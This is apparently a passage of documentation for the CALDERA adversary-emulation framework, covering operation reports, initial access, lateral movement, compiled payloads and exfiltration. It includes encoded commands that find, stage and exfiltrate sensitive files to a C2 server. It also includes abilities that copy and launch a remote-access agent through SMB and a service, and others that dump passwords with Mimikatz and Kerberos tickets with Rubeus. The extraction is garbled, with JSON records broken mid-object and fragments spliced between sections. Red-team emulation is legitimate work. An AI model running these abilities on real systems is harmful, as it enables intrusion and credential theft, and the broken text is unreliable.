"objective": "495a9828-cab1-44dd-a0ca-66e58177d8cc",
"plugin": "stockpile",
"tags": []
},
"facts": [
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"fa7ac865-004d-4296-9d68-fd425a481b5e"
],
"name": "file.sensitive.extension",
"origin_type": "SEEDED",
"relationships": [
"host.file.path(/Users/foo/bar/sensitive.sql) : has_extension : file.sensitive.extension(sql)"
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionsql",
"value": "sql"
},
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"ddf2aa96-24a1-4e71-8360-637a821b0781"
],
"name": "file.sensitive.extension",
"origin_type": "SEEDED",
"relationships": [
"host.file.path(/Users/foo/bar/credentials.yml) : has_extension : file.sensitive.extension(yml)"
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionyml",
"value": "yml"
},
{
"collected_by": [],
"created": "2022-05-11T22:07:07Z",
"limit_count": -1,
"links": [
"719378af-2f64-4902-9b51-fb506166032f"
],
"name": "file.sensitive.extension",
"origin_type": "SEEDED",
"relationships": [
"host.file.path(/Users/foo/bar/PyTorch Models/myModel.pt) : has_extension : file.sensitive.extension(pt)"
],
"score": 6,
"source": "ed32b9c3-9593-4c33-b0db-e2007315096b",
"technique_id": "",
"trait": "file.sensitive.extension",
"unique": "file.sensitive.extensionpt",
"value": "pt"
},
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/PyTorch Models/myModel.pt",
"value": "/Users/foo/bar/PyTorch Models/myModel.pt"
},
{
"collected_by": [
"vrgirx"
],
"created": "2022-05-11T22:09:07Z",
"limit_count": -1,
"links": [
"ddf2aa96-24a1-4e71-8360-637a821b0781"
],
"name": "host.file.path",
"origin_type": "LEARNED",
"relationships": [
"host.file.path(/Users/foo/bar/credentials.yml) : has_extension : file.sensitive.extension(yml)"
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/credentials.yml",
"value": "/Users/foo/bar/credentials.yml"
},
{
"collected_by": [
"vrgirx"
],
"created": "2022-05-11T22:10:45Z",
"limit_count": -1,
"links": [
"fa7ac865-004d-4296-9d68-fd425a481b5e"
],
"name": "host.file.path",
"origin_type": "LEARNED",
"relationships": [
"host.file.path(/Users/foo/bar/sensitive.sql) : has_extension : file.sensitive.extension(sql)"
],
"score": 1,
"source": "3e8c71c1-dfc8-494f-8262-1378e8620791",
"technique_id": "T1005",
"trait": "host.file.path",
"unique": "host.file.path/Users/foo/bar/sensitive.sql",
"value": "/Users/foo/bar/sensitive.sql"
}
],
"finish": "2022-05-11T22:15:04Z",
"host_group": [
{
"architecture": "amd64",
"available_contacts": [
"HTTP"
],
"contact": "HTTP",
"created": "2022-05-11T18:42:02Z",
"deadman_enabled": true,
"display_name": "TARGET-PC$foo",
"exe_name": "splunkd",
"executors": [
"proc",
"sh"
],
",
"delegated": "2022-05-11T22:07:22Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
"link_id": "719378af-2f64-4902-9b51-fb506166032f",
"name": "Find files",
"output": "/Users/foo/bar/PyTorch\\ Models/myModel.pt",
"pid": 56376,
"platform": "darwin",
"run": "2022-05-11T22:08:56Z",
"status": 0
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"agent_reported_time": "2022-05-11T22:09:02Z",
"attack": {
"tactic": "collection",
"technique_id": "T1005",
"technique_name": "Data from Local System"
},
"delegated": "2022-05-11T22:08:57Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
"link_id": "ddf2aa96-24a1-4e71-8360-637a821b0781",
"name": "Find files",
"output": "/Users/foo/bar/credentials.yml",
"pid": 56562,
"platform": "darwin",
"run": "2022-05-11T22:09:07Z",
"status": 0
},
{
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"agent_reported_time": "2022-05-11T22:09:53Z",
"attack": {
"tactic": "collection",
"technique_id": "T1005",
"technique_name": "Data from Local System"
},
"command": "ZmluZCAvVXNlcnMgLW5hbWUgJyouc3FsJyAtdHlwZSBmIC1ub3QgLXBhdGggJyovXC4qJyAtc2l6ZSAtNTAwayAyPi9kZXYvbnVsb",
"delegated": "2022-05-11T22:09:12Z",
"description": "Locate files deemed sensitive",
"executor": "sh",
"link_id": "fa7ac865-004d-4296-9d68-fd425a481b5e",
"name": "Find files",
"output": "/Users/foo/bar/sensitive.sql",
"pid": 56809,
"platform": "darwin",
"run": "2022-05-11T22:10:45Z",
"status": 0
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:10:55Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command": "Y3AgIi9Vc2Vycy9jamVsbGVuL0RvY3VtZW50cy9kZW1vL1B5VG9yY2hcIE1vZGVscy9teU1vZGVsLW5pZ2h0bHkucHQiIC9Vc2Vyc",
"delegated": "2022-05-11T22:10:47Z",
"pid": 57005,
"platform": "darwin",
"run": "2022-05-11T22:10:55Z",
"status": 1
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:11:34Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command": "Y3AgIi9Vc2Vycy9jamVsbGVuL29wdC9hbmFjb25kYTMvZW52cy9mYWlyL2xpYi9weXRob24zLjgvc2l0ZS1wYWNrYWdlcy9zYWNyZ",
"delegated": "2022-05-11T22:10:57Z",
"description": "copy files to staging directory",
"executor": "sh",
"link_id": "a5ef6774-6eed-4383-a769-420092e1ba27",
"name": "Stage sensitive files",
"pid": 57105,
"platform": "darwin",
"run": "2022-05-11T22:11:34Z",
"status": 0
},
{
"ability_id": "4e97e699-93d7-4040-b5a3-2e906a58199e",
"agent_reported_time": "2022-05-11T22:12:22Z",
"attack": {
"tactic": "collection",
"technique_id": "T1074.001",
"technique_name": "Data Staged: Local Data Staging"
},
"command": "Y3AgIi9Vc2Vycy9jamVsbGVuL29wdC9hbmFjb25kYTMvbGliL3B5dGhvbjMuOC9zaXRlLXBhY2thZ2VzL3NhY3JlbW9zZXMvZGF0Y",
"delegated": "2022-05-11T22:11:37Z",
"description": "copy files to staging directory",
"executor": "sh",
"link_id": "b2ba877c-2501-4abc-89a0-aeada909f52b",
"name": "Stage sensitive files",
"pid": 57294,
"platform": "darwin",
"run": "2022-05-11T22:12:22Z",
"status": 0
",
"delegated": "2022-05-11T22:12:27Z",
"description": "Compress a directory on the file system",
"executor": "sh",
"link_id": "795b4b12-1355-49ea-96e8-f6d3d045334d",
"name": "Compress staged directory",
"output": "/Users/foo/staged.tar.gz",
"pid": 57383,
"platform": "darwin",
"run": "2022-05-11T22:13:02Z",
"status": 0
},
{
"ability_id": "ea713bc4-63f0-491c-9a6f-0b01d560b87e",
"agent_reported_time": "2022-05-11T22:14:02Z",
"attack": {
"tactic": "exfiltration",
"technique_id": "T1041",
"technique_name": "Exfiltration Over C2 Channel"
},
"command": "Y3VybCAtRiAiZGF0YT1AL1VzZXJzL2NqZWxsZW4vc3RhZ2VkLnRhci5neiIgLS1oZWFkZXIgIlgtUmVxdWVzdC1JRDogYGhvc3RuY",
"delegated": "2022-05-11T22:13:07Z",
"description": "Exfil the staged directory",
"executor": "sh",
"link_id": "bda3e573-d751-420b-8740-d4a36cee1f9d",
"name": "Exfil staged directory",
"output": " % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed\r 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0\r100 1357 0 0 100 1357 0 441k --:--:-- --:--:-- --:--:-- 441k",
"pid": 57568,
"platform": "darwin",
"run": "2022-05-11T22:14:02Z",
"status": 0
},
{
"ability_id": "300157e5-f4ad-4569-b533-9d1fa0e74d74",
"agent_reported_time": "2022-05-11T22:15:01Z",
"attack": {
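Because each step stores its command base64-encoded, post-processing a downloaded report involves decoding that field; for example (a sketch using a hypothetical step dict):

```python
import base64

def decode_command(step):
    """Decode the base64 'command' field of a report step dict."""
    return base64.b64decode(step["command"]).decode("utf-8", errors="replace")

# Hypothetical step, encoded the way the report stores commands.
step = {"command": base64.b64encode(b"whoami").decode()}
```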
The operation event logs JSON file can be downloaded via the Download event logs button on the operations modal
after selecting an operation from the drop-down menu. To include command output, users should select the include
agent output option. Operation event logs will also be automatically written to disk when an operation completes -
see the section on automatic event log generation.
The event logs JSON is a list of dictionary objects, where each dictionary represents an event that occurred during the
operation (i.e. each link/command). Users can think of this as a “flattened” version of the operation steps displayed
in the traditional report JSON format. However, not all of the operation or agent metadata from the operation report
is included in the operation event logs. The event logs do not include operation facts, nor do they include operation
links/commands that were skipped either manually or because certain requirements were not met (e.g. missing facts or
insufficient privileges). The event log JSON format makes it more convenient to import into databases or SIEM tools.
The event dictionary has the following keys and values:
• command: base64-encoded command that was executed
• delegated_timestamp: Timestamp string in YYYY-MM-DD HH:MM:SS format that indicates when the operation
made the link available for collection
• collected_timestamp: Timestamp in YYYY-MM-DD HH:MM:SS format that indicates when the agent collected
the available link
• finished_timestamp: Timestamp in YYYY-MM-DD HH:MM:SS format that indicates when the agent submitted
the link execution results to the C2 server.
• status: link execution status
• platform: target platform for the agent running the link (e.g. “windows”)
• executor: executor used to run the link command (e.g. “psh” for powershell)
• pid: process ID for the link
• agent_metadata: dictionary containing the following information for the agent that ran the link:
– paw
– group
– architecture
– username
– location
– pid
– ppid
– privilege
– host
– contact
– created
• ability_metadata: dictionary containing the following information about the link ability:
– ability_id
– ability_name
– ability_description
• operation_metadata: dictionary containing the following information about the operation that generated the
link event:
– operation_name
– operation_start: operation start time in YYYY-MM-DD HH:MM:SS format
– operation_adversary: name of the adversary used in the operation
• attack_metadata: dictionary containing the following ATT&CK information for the ability associated with
the link:
– tactic
– technique_id
– technique_name
• output: if the user selected include agent output when downloading the operation event logs, this field
will contain the agent-provided output from running the link command.
• agent_reported_time: Timestamp string representing the time at which the command was run, as reported
by the agent, in YYYY-MM-DD HH:MM:SS format. This field will not be present if the agent does not support
reporting the command execution time.
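As a sketch of how these flat event records lend themselves to tooling, the following loads event logs and tallies executed ATT&CK techniques (field names follow the list above; the summarize_events helper is hypothetical):

```python
import base64
import collections
import json

def summarize_events(raw_json):
    """Tally events per ATT&CK technique and decode each command."""
    events = json.loads(raw_json)
    per_technique = collections.Counter(
        event["attack_metadata"]["technique_id"] for event in events)
    commands = [base64.b64decode(event["command"]).decode() for event in events]
    return per_technique, commands

# A single hypothetical event, shaped like the fields listed above.
sample = json.dumps([{
    "command": base64.b64encode(b"whoami").decode(),
    "attack_metadata": {"technique_id": "T1005"},
}])
counts, commands = summarize_events(sample)
```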
Below is a sample output for operation event logs:
[
{
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLnBuZyAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGlud",
"delegated_timestamp": "2021-02-23T11:50:12Z",
"collected_timestamp": "2021-02-23T11:50:14Z",
"finished_timestamp": "2021-02-23T11:50:14Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 7016,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
"host": "WORKSTATION1",
"contact": "HTTP",
"created": "2021-02-23T11:48:33Z"
},
"ability_metadata": {
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"ability_name": "Find files",
"ability_description": "Locate files deemed sensitive"
},
"operation_metadata": {
"operation_name": "My Operation",
"operation_start": "2021-02-23T11:50:12Z",
"operation_adversary": "Collection"
},
"attack_metadata": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
},
",
"delegated_timestamp": "2021-02-23T11:50:17Z",
"collected_timestamp": "2021-02-23T11:50:21Z",
"finished_timestamp": "2021-02-23T11:50:21Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 1048,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
"host": "WORKSTATION1",
"contact": "HTTP",
"created": "2021-02-23T11:48:33Z"
},
"ability_metadata": {
"ability_id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b",
"ability_name": "Find files",
"ability_description": "Locate files deemed sensitive"
},
"operation_metadata": {
"operation_name": "My Operation",
"operation_start": "2021-02-23T11:50:12Z",
"operation_adversary": "Collection"
},
"attack_metadata": {
"tactic": "collection",
"technique_name": "Data from Local System",
"technique_id": "T1005"
},
"agent_reported_time": "2021-02-23T11:50:18Z"
},
{
"command": "R2V0LUNoaWxkSXRlbSBDOlxVc2VycyAtUmVjdXJzZSAtSW5jbHVkZSAqLndhdiAtRXJyb3JBY3Rpb24gJ1NpbGVudGx5Q29udGlud",
"delegated_timestamp": "2021-02-23T11:50:22Z",
"collected_timestamp": "2021-02-23T11:50:27Z",
"finished_timestamp": "2021-02-23T11:50:27Z",
"status": 0,
"platform": "windows",
",
"delegated_timestamp": "2021-02-23T11:50:32Z",
"collected_timestamp": "2021-02-23T11:50:37Z",
"finished_timestamp": "2021-02-23T11:50:37Z",
"status": 0,
"platform": "windows",
"executor": "psh",
"pid": 3212,
"agent_metadata": {
"paw": "pertbn",
"group": "red",
"architecture": "amd64",
"username": "BYZANTIUM\\Carlomagno",
"location": "C:\\Users\\Public\\sandcat.exe",
"pid": 5896,
"ppid": 2624,
"privilege": "Elevated",
When an operation terminates, the corresponding event logs will be written to disk in the same format as if they were
manually requested for download. These event logs will contain command output and will be unencrypted on disk.
Each operation will have its own event logs written to a separate file in the directory $reports_dir/event_logs,
where $reports_dir is the reports_dir entry in the CALDERA configuration file. The filename will be of the
format operation_$id.json, where $id is the unique ID of the operation.
CHAPTER
TWELVE
INITIAL ACCESS ATTACKS
CALDERA makes initial access attacks easy by leveraging the Access plugin. This guide will walk you through
how to launch an initial access attack, as well as how to build your own.
Start by deploying an agent locally. This agent will be your “assistant”. It will execute any attack you feed it. You could
alternatively deploy the agent remotely, which will help mask where your initial access attacks are originating.
From the Access plugin, select your agent and either the initial access tactic or any pre-ATT&CK tactic. This will filter
the abilities. Select any ability within your chosen tactic.
Once selected, a pop-up box will show you details about the ability. You’ll need to fill in values for any properties your
selected ability requires. Click OK when done.
Finally, click to run the ability against your selected agent. The ability will be in one of three states: IN-PROGRESS,
SUCCESS, or FAILED. If it is in either of the latter two states, you can view the logs from the executed ability by
clicking on the star.
You can easily add new initial access or pre-ATT&CK abilities yourself.
You can use an existing binary or write your own - in any language - to act as your payload. The binary itself should
contain the code to execute your attack. It can be as simple or complex as you’d like. It should accept parameters for
any dynamic behaviors. At minimum, you should require a parameter for “target”, which would be your intended IP
address, FQDN or other target that your attack will run against.
As an example, look at the scanner.sh binary used for conducting a simple NMAP scan:
#!/bin/bash
# Echo a few log statements, then scan the target passed as the first parameter.
echo "[+] Starting NMAP scan of $1"
nmap -Pn "$1"
echo "[+] Scan complete"
This binary simply echos a few log statements and runs an NMAP scan against the first parameter (i.e., the target)
passed to it.
With your binary at hand, you can now create a new ability YML file inside the Access plugin
(plugins/access/data/abilities/*). Select the correct tactic directory (or create one if it does not exist). Here is what
the YML file looks like for the scanner.sh binary:
---
- id: 567eaaba-94cc-4a27-83f8-768e5638f4e1
  name: NMAP scan
  description: Scan an external host for open ports and services
  tactic: technical-information-gathering
  technique:
    name: Conduct active scanning
    attack_id: T1254
  platforms:
    darwin,linux:
      sh:
        command: |
          ./scanner.sh #{target.ip}
        timeout: 300
        payloads:
          - scanner.sh
This is the same format that is used for other CALDERA abilities, so refer to the Learning the terminology page for a
run-through of all the fields.
With your ability YML file loaded, restart CALDERA and head to the Access plugin to run it.
THIRTEEN
LATERAL MOVEMENT GUIDE
Exercising Caldera’s lateral movement and remote execution abilities allows you to test how easily an adversary can
move within your network. This guide will walk you through some of the necessary setup steps to get started with
testing lateral movement in a Windows environment.
13.1 Setup
The firewall of the target host should not be blocking UDP ports 137 and 138 and TCP ports 139 and 445. The firewall
should also allow inbound file and printer sharing.
netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
This guide will assume a user with administrative privileges to the target host has been compromised and that a
CALDERA agent has been spawned with this user’s privileges. Some methods of lateral movement may depend on
whether (1) the user has administrative privileges but is not a domain account or (2) the user has administrative
privileges and is a domain account. The example walkthrough in this guide should not be impacted by these distinctions.
Lateral movement is typically a combination of two steps. The first is confirming remote access to the next target
host and moving or uploading the remote access tool (RAT) executable to that host. The second is executing the binary;
once the RAT calls back from the new host, the lateral movement is complete.
Most of CALDERA’s lateral movement and execution abilities found in Stockpile have fact or relationship requirements
that must be satisfied. This information may be passed to the operation in two ways:
1. The fact and relationship information may be added to an operation’s source. A new source can be created or
this information can be added to an already existing source as long as that source is used by the operation. When
configuring an operation, open the “AUTONOMOUS” drop down section and select “Use [insert source name]
facts” to indicate to the operation that it should take in fact and relationship information from the selected source.
2. The fact and relationship information can be discovered by an operation. This requires additional abilities to be
run prior to the lateral movement and execution abilities in order to collect the fact and relationship information
needed to satisfy the ability requirements.
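As a sketch of option 1, a fact source is essentially a named set of fact traits and values. The file below is a hypothetical example (the id, file name, and fact value are illustrative, not a real CALDERA source):

```shell
# Write a hypothetical fact source as YAML and confirm the trait is present.
cat > /tmp/sc_source.yml <<'EOF'
id: 11111111-2222-3333-4444-555555555555
name: SC Source
facts:
- trait: remote.host.fqdn
  value: VAGRANTDC.mydomain.local
EOF
grep 'trait: remote.host.fqdn' /tmp/sc_source.yml
```

The trait name remote.host.fqdn matches the fact requirement used by the lateral movement abilities later in this guide.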
There are several ways a binary can be moved or uploaded from one host to another. Some example methods used in
CALDERA’s lateral movement abilities include:
1. WinRM
2. SCP
3. wmic
4. SMB
5. psexec
Based on the tool used, additional permissions may need to be changed in order for users to conduct these actions
remotely.
CALDERA’s Stockpile execution abilities relevant to lateral movement mainly use wmic to remotely start the binary.
Some additional execution methods include modifications to Windows services and scheduled tasks. The example in
this guide will use the creation of a service to remotely start the binary (ability file included at the end of this guide).
See ATT&CK’s Execution tactic page for more details on execution methods.
Using the adversary profile in this guide and CALDERA’s Debrief plugin, you can view the path an adversary took
through the network via lateral movement attempts. In the Debrief modal, select the operation where lateral movement
was attempted then select the Attack Path view from the upper right hand corner of graph views. This graph displays
the originating C2 server and agent nodes connected by the execution command linking the originating agent to the
newly spawned agent.
In the example attack path graph below, the Service Creation Lateral Movement adversary profile was run on the win10
host, which moved laterally to the VAGRANTDC machine via successful execution of the Service Creation ability.
This capability relies on the origin_link_id field to be populated within the agent profile upon first check-in and
is currently implemented for the default agent, Sandcat. For more information about the #{origin_link_id} global
variable, see the explanation of Command in the What is an Ability? section of the Learning the Terminology guide.
For more information about how lateral movement tracking is implemented in agents to be used with CALDERA, see
the Lateral Movement Tracking section of the How to Build Agents guide.
This section will walk through the necessary steps for proper execution of the Service Creation Lateral Movement
adversary profile. This section will assume successful setup from the previous sections mentioned in this guide and
that a Sandcat agent has been spawned with administrative privileges to the remote target host. The full ability files
used in this adversary profile are included at the end of this guide.
1. Go to navigate pane > Advanced > sources. This should open a new sources modal in the web GUI.
2. Click the toggle to create a new source. Enter “SC Source” as the source name. Then enter remote.host.fqdn
as the fact name and the FQDN of the target host you are looking to move laterally to as the fact value. Click
Save once source configuration has been completed.
3. Go to navigate pane > Campaigns > operations. Click the toggle to create a new operation. Under BASIC
OPTIONS select the group with the relevant agent and the Service Creation Lateral Movement profile. Under
AUTONOMOUS, select Use SC Source facts. If the source created from the previous step is not available in the
drop down, try refreshing the page.
4. Once operation configurations have been completed, click Start to start the operation.
5. Check the agents list for a new agent on the target host.
- id: deeac480-5c2a-42b5-90bb-41675ee53c7e
  name: View remote shares
  description: View the shares of a remote host
  tactic: discovery
  technique:
    attack_id: T1135
    name: Network Share Discovery
  platforms:
    windows:
      psh:
        command: net view \\#{remote.host.fqdn} /all
        parsers:
          plugins.stockpile.app.parsers.net_view:
          - source: remote.host.fqdn
            edge: has_share
            target: remote.host.share
      cmd:
        command: net view \\#{remote.host.fqdn} /all
        parsers:
          plugins.stockpile.app.parsers.net_view:
          - source: remote.host.fqdn
            edge: has_share
            target: remote.host.share
- id: 65048ec1-f7ca-49d3-9410-10813e472b30
  name: Copy Sandcat (SMB)
  description: Copy Sandcat to remote host (SMB)
  tactic: lateral-movement
  technique:
    attack_id: T1021.002
    name: "Remote Services: SMB/Windows Admin Shares"
  platforms:
    windows:
      psh:
        command: |
          $path = "sandcat.go-windows";
          $drive = "\\#{remote.host.fqdn}\C$";
          Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
        cleanup: |
          $drive = "\\#{remote.host.fqdn}\C$";
          Remove-Item -Path $drive"\Users\Public\s4ndc4t.exe" -Force;
        parsers:
          plugins.stockpile.app.parsers.54ndc47_remote_copy:
          - source: remote.host.fqdn
            edge: has_54ndc47_copy
        payloads:
        - sandcat.go-windows
  requirements:
  - plugins.stockpile.app.requirements.not_exists:
    - source: remote.host.fqdn
      edge: has_54ndc47_copy
- id: 95727b87-175c-4a69-8c7a-a5d82746a753
  name: Service Creation
  description: Create a service named "sandsvc" to execute remote Sandcat binary named "s4ndc4t.exe"
  tactic: execution
  technique:
    attack_id: T1569.002
    name: 'System Services: Service Execution'
  platforms:
    windows:
      psh:
        timeout: 300
        cleanup: |
          sc.exe \\#{remote.host.fqdn} stop sandsvc;
          sc.exe \\#{remote.host.fqdn} delete sandsvc /f;
          taskkill /s \\#{remote.host.fqdn} /FI "Imagename eq s4ndc4t.exe"
        command: |
          sc.exe \\#{remote.host.fqdn} create sandsvc start= demand error= ignore binpath= "cmd /c start C:\Users\Public\s4ndc4t.exe -server #{server} -v -originLinkID #{origin_link_id}"
FOURTEEN
DYNAMICALLY-COMPILED PAYLOADS
The Builder plugin can be used to create dynamically-compiled payloads. Currently, the plugin supports C#, C, C++,
and Golang.
Code is compiled in a Docker container. The resulting executable, along with any additional references, will be copied
to the remote machine and executed.
Details for the available languages are below:
• csharp: Compile C# executable using Mono
• cpp_windows_x64: Compile 64-bit Windows C++ executable using MXE/MinGW-w64
• cpp_windows_x86: Compile 32-bit Windows C++ executable using MXE/MinGW-w64
• c_windows_x64: Compile 64-bit Windows C executable using MXE/MinGW-w64
• c_windows_x86: Compile 32-bit Windows C executable using MXE/MinGW-w64
• go_windows: Build Golang executable for Windows
The following “Hello World” ability can be used as a template for C# ability development:
---

- id: 096a4e60-e761-4c16-891a-3dc4eff02e74
  name: Test C# Hello World
  description: Dynamically compile HelloWorld.exe
  tactic: execution
  technique:
    attack_id: T1059
    name: Command-Line Interface
  platforms:
    windows:
      psh,cmd:
        build_target: HelloWorld.exe
        language: csharp
        code: |
          using System;

          namespace HelloWorld
          {
              class Program
              {
                  static void Main(string[] args)
                  {
                      Console.WriteLine("Hello World!");
                  }
              }
          }
It is possible to reference a source code file as well. The source code file should be in the plugin’s payloads/ directory.
This is shown in the example below:
---

- id: 096a4e60-e761-4c16-891a-3dc4eff02e74
  name: Test C# Hello World
  description: Dynamically compile HelloWorld.exe
  tactic: execution
  technique:
    attack_id: T1059
    name: Command-Line Interface
  platforms:
    windows:
      psh,cmd:
        build_target: HelloWorld.exe
        language: csharp
        code: HelloWorld.cs
14.2.1 Arguments
It is possible to call dynamically-compiled executables with command line arguments by setting the ability command
value. This allows for the passing of facts into the ability. The following example demonstrates this:
---

- id: ac6106b3-4a45-4b5f-bebf-0bef13ba7c81
  name: Test C# Code with Arguments
  description: Hello Name
  tactic: execution
  technique:
    attack_id: T1059
    name: Command-Line Interface
  platforms:
    windows:
      psh,cmd:
        build_target: HelloName.exe
        command: .\HelloName.exe "#{paw}"
        language: csharp
        code: |
          using System;

          namespace HelloWorld
          {
              class Program
              {
                  static void Main(string[] args)
                  {
                      if (args.Length == 0) {
                          Console.WriteLine("No name provided");
                      }
                      else {
                          Console.WriteLine("Hello " + Convert.ToString(args[0]));
                      }
                  }
              }
          }
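The argument-handling pattern above can be sketched offline with a small shell stand-in for the compiled payload (the file name and sample value are illustrative): CALDERA substitutes #{paw} into the command line before execution, and the payload simply reads its argument list.

```shell
# Stand-in for HelloName.exe: greet the first argument if one was supplied.
cat > /tmp/helloname.sh <<'EOF'
#!/bin/sh
if [ $# -eq 0 ]; then
    echo "No name provided"
else
    echo "Hello $1"
fi
EOF
chmod +x /tmp/helloname.sh
/tmp/helloname.sh "abcdef"   # as if #{paw} had expanded to the paw "abcdef" -> prints "Hello abcdef"
```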
14.2.2 DLL Dependencies
DLL dependencies can be added, at both compilation and execution times, using the ability payload field. The
referenced library should be in a plugin's payloads folder, the same as any other payload.
The following ability references SharpSploit.dll and dumps logon passwords using Mimikatz:
---

- id: 16bc2258-3b67-46c1-afb3-5269b6171c7e
  name: SharpSploit Mimikatz (DLL Dependency)
  description: SharpSploit Mimikatz
  tactic: credential-access
  technique:
    attack_id: T1003
    name: Credential Dumping
  privilege: Elevated
  platforms:
    windows:
      psh,cmd:
        build_target: CredDump.exe
        language: csharp
        code: |
          using System;
          using System.IO;
          using SharpSploit;

          namespace CredDump
          {
              class Program
              {
                  static void Main(string[] args)
                  {
                      string logonPasswords = SharpSploit.Credentials.Mimikatz.LogonPasswords();
                      Console.WriteLine(logonPasswords);
                  }
              }
          }
        parsers:
          plugins.stockpile.app.parsers.katz:
          - source: domain.user.name
            edge: has_password
            target: domain.user.password
          - source: domain.user.name
            edge: has_hash
            target: domain.user.ntlm
          - source: domain.user.name
            edge: has_hash
            target: domain.user.sha1
        payloads:
        - SharpSploit.dll
14.2.3 Donut
The donut_amd64 executor uses Donut to convert a dynamically-compiled executable into shellcode that is executed in
memory. The following example is the Donut version of the "Hello Name" ability:
---

- id: 7edeece0-9a0e-4fdc-a93d-86fe2ff8ad55
  name: Test Donut with Arguments
  description: Hello Name Donut
  tactic: execution
  technique:
    attack_id: T1059
    name: Command-Line Interface
  platforms:
    windows:
      donut_amd64:
        build_target: HelloNameDonut.donut
        command: .\HelloNameDonut.donut "#{paw}" "#{server}"
        language: csharp
        code: |
          using System;

          namespace HelloNameDonut
          {
              class Program
              {
                  static void Main(string[] args)
                  {
                      if (args.Length < 2) {
                          Console.WriteLine("No name, no server");
                      }
                      else {
                          Console.WriteLine("Hello " + Convert.ToString(args[0]) + " from " + Convert.ToString(args[1]));
                      }
                  }
              }
          }
Donut can also be used to read from pre-compiled executables. .NET Framework 4 is required. Executables will be
found with either a .donut.exe or a .exe extension, and .donut.exe extensions will be prioritized. The following
example will transform a payload named Rubeus.donut.exe into shellcode which will be executed in memory. Note
that Rubeus.donut is specified in the payload and command:
---

- id: 043d6200-0541-41ee-bc7f-bcc6ba15facd
  name: TGT Dump
  description: Dump TGT tickets with Rubeus
  tactic: credential-access
  technique:
    attack_id: T1558
    name: Steal or Forge Kerberos Tickets
  privilege: Elevated
  platforms:
    windows:
      donut_amd64:
        command: .\Rubeus.donut dump /nowrap
        payloads:
        - Rubeus.donut
FIFTEEN
EXFILTRATION
After completing an operation, a user may want to review the data retrieved from the target system. This data is
automatically stored on the CALDERA server in a directory specified in /conf/default.yml.
Some abilities will transfer files from the agent to the CALDERA server. This can also be done manually.
Note: localhost may be rejected in place of the server IP, resulting in error 7; if so, use the full IP address. Files
are sent from the agent to server_ip/file/upload, at which point the server places them inside the directory specified
by the "exfil_dir" key in /conf/default.yml. By default it is set to /tmp/caldera.
Files can be accessed by pulling them directly from that location on the server and manually decrypting them.
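As a hedged sketch of the manual route (the server address is a placeholder that must match your deployment; the /file/upload route is the one described above), a file can be pushed with curl as multipart form data:

```shell
# Stage a file, then POST it to the server's upload endpoint as form data.
# SERVER is a placeholder; the request fails harmlessly when no server exists.
SERVER="http://192.168.137.122:8888"
echo "collected data" > /tmp/loot.txt
curl -s --connect-timeout 3 -F "data=@/tmp/loot.txt" "$SERVER/file/upload" \
    || echo "upload skipped (no reachable server in this sketch)"
```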
To simplify accessing exfiltrated files from a running CALDERA server, you can go to the Advanced section in the
CALDERA UI and click on the 'exfilled files' section.
From there, you can select an operation (or all of them) from the drop down to see a listing of the files in the exfil
folder corresponding to that operation (this specifically works with Sandcat agents, or any other agent using the same
naming scheme for the file upload folder), along with the option to select any number of files to download directly to
your machine.
All downloaded files are decrypted before being passed along as a download.
After the server is shut down, the reports from operations are placed inside the directory specified by the
"reports_dir" key in /conf/default.yml. By default it is also set to /tmp.
The reports and exfiltrated files are encrypted on the server. To view the file contents, the user will have to decrypt
each file using /app/utility/file_decryptor.py.
The output file will already have the _decrypted tag appended to the end of the file name once the decrypted file is
created by the Python script.
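A hedged sketch of the decryption step (the install and exfil paths below are assumptions; adjust them to your deployment, and note the script's exact flags may differ by version):

```shell
# Assemble the decryption command for one exfiltrated file (paths are examples).
DECRYPTOR="/opt/caldera/app/utility/file_decryptor.py"
CONFIG="/opt/caldera/conf/default.yml"
ENCRYPTED="/tmp/caldera/example-agent/loot.txt"
# Running this command writes the plaintext next to the input, tagged _decrypted.
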